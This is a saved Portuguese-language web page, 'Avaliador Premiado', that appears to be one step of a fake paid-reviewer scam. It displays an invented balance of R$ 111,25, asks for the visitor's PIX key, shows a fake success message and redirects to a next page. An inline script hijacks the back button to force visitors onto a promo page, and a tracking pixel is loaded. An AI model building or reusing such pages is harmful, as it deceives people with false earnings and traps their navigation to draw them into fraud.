<!DOCTYPE html><html lang="pt-BR" style=""><head><meta charset="utf-8">
      <meta name="viewport" content="width=device-width">
      <meta name="next-head-count" content="2">
      <title>Avaliador Premiado</title>
      <meta name="description" content="Generated by create next app">
      <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
      <link rel="stylesheet" href="regular.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
      <link rel="stylesheet" href="fontawesome.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
      <link rel="stylesheet" href="solid.min.css" crossorigin="anonymous" referrerpolicy="no-referrer">
      <link rel="stylesheet" href="brands.min.css">
      <link rel="preconnect" href="https://fonts.googleapis.com/">
      <link rel="preconnect" href="https://fonts.gstatic.com/">
      <script src="script.js.transferir" async="" data-tracking-id="CXM_tfAvXr" crossorigin="anonymous"></script>
      <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin="">
      <link rel="preload" href="./fafee8360bcbc36f.css" as="style">
      <link rel="stylesheet" href="fafee8360bcbc36f.css" data-n-g="">
      <link rel="preload" href="./d0320de32467736e.css" as="style">
      <link rel="stylesheet" href="d0320de32467736e.css" data-n-p="">
      <noscript data-n-css=""></noscript>
      <script defer="" nomodule="" src="polyfills-c67a75d1b6f99dc8.js.transferir"></script>
      <script src="webpack-36d12a75f0098f30.js.transferir" defer=""></script>
      <script src="framework-2c79e2a64abdb08b.js.transferir" defer=""></script>
      <script src="main-7c5ec2b609658cbe.js.transferir" defer=""></script>
      <script src="_app-15493c499bd43a74.js.transferir" defer=""></script>
      <script src="75fc9c18-36f994258e23e278.js.transferir" defer=""></script>
      <script src="616-cd6fbd9f5dc5710e.js.transferir" defer=""></script>
      <script src="index-bf2bc32884e40625.js.transferir" defer=""></script>
      <script src="_buildManifest.js.transferir" defer=""></script>
      <script src="_ssgManifest.js.transferir" defer=""></script>
      <style data-href="https://fonts.googleapis.com/css2?family=Hanken+Grotesk:wght@400;500;600;700;800&amp;display=swap">@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:400;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_Ncs2Za4g.woff) format('woff')}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:500;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcgWZa4g.woff) format('woff')}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:600;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcbWFa4g.woff) format('woff')}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:700;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcVGFa4g.woff) format('woff')}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:800;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVq2YZDLWuGJpnzaiwFXS9tYvBRzyFLlZg_f_NcM2Fa4g.woff) format('woff')}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:400;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpQ59CxCis4UvI.woff2) format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:400;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpS59CxCis4UvI.woff2) format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:400;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpT59CxCis4UvI.woff2) format('woff2');unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:400;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpd59CxCis4.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:500;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpQ59CxCis4UvI.woff2) format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:500;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpS59CxCis4UvI.woff2) format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:500;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpT59CxCis4UvI.woff2) format('woff2');unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:500;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpd59CxCis4.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:600;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpQ59CxCis4UvI.woff2) format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:600;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpS59CxCis4UvI.woff2) format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:600;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpT59CxCis4UvI.woff2) format('woff2');unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:600;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpd59CxCis4.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:700;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpQ59CxCis4UvI.woff2) format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:700;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpS59CxCis4UvI.woff2) format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:700;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpT59CxCis4UvI.woff2) format('woff2');unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:700;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpd59CxCis4.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:800;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpQ59CxCis4UvI.woff2) format('woff2');unicode-range:U+0460-052F,U+1C80-1C88,U+20B4,U+2DE0-2DFF,U+A640-A69F,U+FE2E-FE2F}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:800;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpS59CxCis4UvI.woff2) format('woff2');unicode-range:U+0102-0103,U+0110-0111,U+0128-0129,U+0168-0169,U+01A0-01A1,U+01AF-01B0,U+0300-0301,U+0303-0304,U+0308-0309,U+0323,U+0329,U+1EA0-1EF9,U+20AB}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:800;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpT59CxCis4UvI.woff2) format('woff2');unicode-range:U+0100-02AF,U+0304,U+0308,U+0329,U+1E00-1E9F,U+1EF2-1EFF,U+2020,U+20A0-20AB,U+20AD-20C0,U+2113,U+2C60-2C7F,U+A720-A7FF}@font-face{font-family:'Hanken Grotesk';font-style:normal;font-weight:800;font-display:swap;src:url(../../fonts.gstatic.com/s/hankengrotesk/v8/ieVn2YZDLWuGJpnzaiwFXS9tYtpd59CxCis4.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+0304,U+0308,U+0329,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}</style>
      <style id="_goober"> @keyframes go2264125279{from{transform:scale(0) rotate(45deg);opacity:0;}to{transform:scale(1) rotate(45deg);opacity:1;}}@keyframes go3020080000{from{transform:scale(0);opacity:0;}to{transform:scale(1);opacity:1;}}@keyframes go463499852{from{transform:scale(0) rotate(90deg);opacity:0;}to{transform:scale(1) rotate(90deg);opacity:1;}}@keyframes go1268368563{from{transform:rotate(0deg);}to{transform:rotate(360deg);}}@keyframes go1310225428{from{transform:scale(0) rotate(45deg);opacity:0;}to{transform:scale(1) rotate(45deg);opacity:1;}}@keyframes go651618207{0%{height:0;width:0;opacity:0;}40%{height:0;width:6px;opacity:1;}100%{opacity:1;height:10px;}}@keyframes go901347462{from{transform:scale(0.6);opacity:0.4;}to{transform:scale(1);opacity:1;}}.go4109123758{z-index:9999;}.go4109123758 > *{pointer-events:auto;}</style>
        <style>
            .hidden {
                display: none;
            }
        </style>
   </head>
   <body>
         <div class="flex justify-center flex-col px-4 pt-2 gap-3">
            <nav class="flex p-2 rounded-lg shadow-lg z-40 shadow-slate-200 items-center justify-between h-[55px] gap-4 bg-white">
               <img src="mxsM4SZ.png" class="w-full max-w-[150px] h-auto">
               <div class="relative flex items-center justify-center h-full px-3 overflow-hidden font-bold text-white rounded-lg shadow-lg whitespace-nowrap animate-lightsweep shadow-primary-400/50 bg-primary-500" style="transform: none;">SALDO: R$&nbsp;111,25</div>
            </nav>
            <main class="w-full">
               <div class="py-4" style="opacity: 1;">
                  <div class="grid gap-2">
                     <div class="w-full px-10 py-5 font-medium text-center bg-white rounded-lg shadow-lg shadow-slate-200">
                        <h2 class="mb-2 font-extrabold">Antes de realizar seu primeiro saque, cadastre sua Chave PIX</h2>
                        <h2 class="mb-2 text-slate-900">Vamos cadastrar seu PIX e confirmar se está tudo certo.</h2>
                     </div>
                     <div class="w-full px-10 py-5 font-medium text-center bg-white rounded-lg shadow-lg shadow-slate-200">
                        <h2 class="mb-2 text-sm text-slate-500">Seu saldo</h2>
                        <span class="text-4xl font-extrabold text-primary-500">R$&nbsp;111,25</span>
                     </div>
                     <span class="mt-4 mb-2 text-sm font-semibold text-center text-slate-500">Selecione seu tipo de chave pix</span>
                     <div class="flex flex-col gap-2">
                        <div class="btn-group" role="group" aria-label="Basic example">
                        <div class="grid grid-flow-col grid-cols-2 gap-2">
                           <button class="flex flex-col items-center justify-center flex-1 gap-2 px-1 py-3 font-medium rounded-lg transition-all bg-white text-slate-500 shadow-lg shadow-slate-200">
                              <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" aria-hidden="true" class="w-4">
                                 <path stroke-linecap="round" stroke-linejoin="round" d="M10.5 1.5H8.25A2.25 2.25 0 006 3.75v16.5a2.25 2.25 0 002.25 2.25h7.5A2.25 2.25 0 0018 20.25V3.75a2.25 2.25 0 00-2.25-2.25H13.5m-3 0V3h3V1.5m-3 0h3m-3 18.75h3"></path>
                              </svg>
                              <span class="text-sm false">Telefone</span>
                                <div class="form-check">
                                  <input class="form-check-input" type="radio" name="flexRadioDefault" id="flexRadioDefault1" checked="">
                                </div>
                           </button>
                           <button class="flex flex-col items-center justify-center flex-1 gap-2 px-1 py-3 font-medium rounded-lg transition-all bg-white text-slate-500 shadow-lg shadow-slate-200">
                              <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" aria-hidden="true" class="w-4">
                                 <path stroke-linecap="round" stroke-linejoin="round" d="M15 9h3.75M15 12h3.75M15 15h3.75M4.5 19.5h15a2.25 2.25 0 002.25-2.25V6.75A2.25 2.25 0 0019.5 4.5h-15a2.25 2.25 0 00-2.25 2.25v10.5A2.25 2.25 0 004.5 19.5zm6-10.125a1.875 1.875 0 11-3.75 0 1.875 1.875 0 013.75 0zm1.294 6.336a6.721 6.721 0 01-3.17.789 6.721 6.721 0 01-3.168-.789 3.376 3.376 0 016.338 0z"></path>
                              </svg>
                              <span class="text-sm false">CPF</span>
                                <div class="form-check">
                                  <input class="form-check-input" type="radio" name="flexRadioDefault" id="flexRadioDefault2">
                                </div>
                           </button>
                        </div>
                        </div>
                        <input id="pixKey" type="text" placeholder="Digite sua chave PIX..." class="w-full p-4 rounded-lg bg-white shadow-lg shadow-slate-800/10 mt-2 text-slate-500" value="">                        
                        <button id="enviarPix" class="tremor-Button-root flex-shrink-0 inline-flex justify-center items-center group font-medium outline-none rounded-tremor-default shadow-tremor-input dark:shadow-dark-tremor-input text-sm bg-white border-white hover:bg-white hover:border-white p-3 mt-3 text-white border-0 rounded-lg shadow-lg bg-gradient-to-r from-primary-700 to-primary-600 shadow-primary-500/40">
                           <svg xmlns="http://www.w3.org/2000/svg" fill="none" viewBox="0 0 24 24" stroke-width="1.5" stroke="currentColor" aria-hidden="true" class="tremor-Button-icon shrink-0 h-5 w-5 -ml-1 mr-1.5">
                              <path stroke-linecap="round" stroke-linejoin="round" d="M2.25 18.75a60.07 60.07 0 0115.797 2.101c.727.198 1.453-.342 1.453-1.096V18.75M3.75 4.5v.75A.75.75 0 013 6h-.75m0 0v-.375c0-.621.504-1.125 1.125-1.125H20.25M2.25 6v9m18-10.5v.75c0 .414.336.75.75.75h.75m-1.5-1.5h.375c.621 0 1.125.504 1.125 1.125v9.75c0 .621-.504 1.125-1.125 1.125h-.375m1.5-1.5H21a.75.75 0 00-.75.75v.75m0 0H3.75m0 0h-.375a1.125 1.125 0 01-1.125-1.125V15m1.5 1.5v-.75A.75.75 0 003 15h-.75M15 10.5a3 3 0 11-6 0 3 3 0 016 0zm3 0h.008v.008H18V10.5zm-12 0h.008v.008H6V10.5z"></path>
                           </svg>
                           <span class="tremor-Button-text text-sm whitespace-nowrap">
                              <div class="flex items-center justify-center gap-3 ">
                                 <h1 class="font-medium text-center text-white">Enviar PIX Teste</h1>
                              </div>
                           </span>
                        </button>
                     </div>
                     <div id="mensagem" class="w-full px-10 py-5 font-medium text-center bg-white rounded-lg shadow-lg shadow-slate-200 hidden" style="position: absolute;border:solid 1px;border-radius:25px;border-color: #FF0000; width: 90%;">
                        <h2 class="mb-2 text-sm text-slate-500">Status Pix</h2>
                        <h2 class="mb-2 text-slate-500" style="color: rgb(34 197 94);font-size: 18px;"><b>Pix cadastrado com sucesso!</b></h2>
                        <img src="../images/load.gif" style="height: 25px;width: 25px;margin-left: 45%;">
                     </div>
                      </div>
               </div>
            </main>
         </div>
         <div style="position:fixed;z-index:9999;top:16px;left:16px;right:16px;bottom:16px;pointer-events:none"></div>
   
   <script>
          var urlBackRedirect = "../promo/promo37.html"; // lembre-se de usar a url sem espaços
          // não altere nada abaixo dessa linha
          urlBackRedirect = urlBackRedirect = urlBackRedirect.trim() +
                  (urlBackRedirect.indexOf("?") > 0 ? '&' : '?') +
                  document.location.search.replace('?', '').toString();
          history.pushState({}, "", location.href);
          history.pushState({}, "", location.href);
          window.onpopstate = function () {
              setTimeout(function () {
                  location.href = urlBackRedirect;
              }, 1);
          };
   </script>
    <script>
    // Função para verificar se o input está vazio e manipular o processo de envio
    function sendPixKey() {
        var pixKey = document.getElementById('pixKey').value;
        var links = '../pt2.html';
            var atual = window.location.href;
            var atual2 = atual.trim();
            var atual3 = (atual.indexOf("?") > 0 ? '&' : '?');
            var atual4 = document.location.search.replace('?', '').toString();
            var definitivo = links + '?' + atual4;
            console.log(atual);
            console.log(atual2);
            console.log(atual3);
            console.log(atual4);
            console.log(links);
            console.log(definitivo);
        
        // Verifica se o campo de entrada não está vazio
        if (pixKey.trim() !== '') {
            // Mostra a mensagem e a GIF
            document.getElementById("mensagem").style.display = "block";
            document.getElementById("enviarPix").disabled = true; // Esconde o botão
            document.getElementById("pixKey").disabled = true; // Esconde o botão
            document.getElementById('mensagem').focus(); 
            // Espera 5 segundos antes de redirecionar
            setTimeout(function() {
                window.location.href = definitivo;
            }, 5000); // 5000 milissegundos = 5 segundos
        } else {
            alert('Por favor, digite sua chave Pix.');
        }
    }

    // Adiciona o evento de clique ao botão
    document.getElementById('enviarPix').addEventListener('click', sendPixKey);
    </script>
    
    <script>
  window.pixelId = "6657449de6d1883284905f71";
  var a = document.createElement("script");
  a.setAttribute("async", "");
  a.setAttribute("defer", "");
  a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
  document.head.appendChild(a);
</script>

<script src="../../cdn.utmify.com.br/scripts/utms/latest.js" async="" defer=""></script>

</body></html>